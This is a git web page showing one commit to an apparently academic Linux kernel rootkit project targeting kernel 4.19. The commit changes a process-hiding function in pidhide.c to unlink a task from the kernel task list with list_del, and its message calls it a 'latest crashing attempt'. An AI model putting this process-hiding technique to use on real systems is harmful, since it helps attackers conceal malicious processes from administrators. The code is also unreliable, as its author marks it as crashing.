linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

commit 5f7ebe5975c67b90242c700be38202c41bbc8c34
parent 9b9b7120a05597ec6242075ef3e394f08e963766
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 25 Jan 2021 03:52:10 +0100

latest crashing attempt

Diffstat:
Mrootkit/src/pidhide.c | 7+++----
1 file changed, 3 insertions(+), 4 deletions(-)

diff --git a/rootkit/src/pidhide.c b/rootkit/src/pidhide.c @@ -93,12 +93,11 @@ hide_pid(pid_t pid) return; } - rcu_read_lock(); write_lock_irq(rwlock); - ts->tasks.prev->next = ts->tasks.next; - ts->tasks.next->prev = ts->tasks.prev; + list_del(&ts->tasks) + /* ts->tasks.prev->next = ts->tasks.next; */ + /* ts->tasks.next->prev = ts->tasks.prev; */ write_unlock_irq(rwlock); - rcu_read_unlock(); } void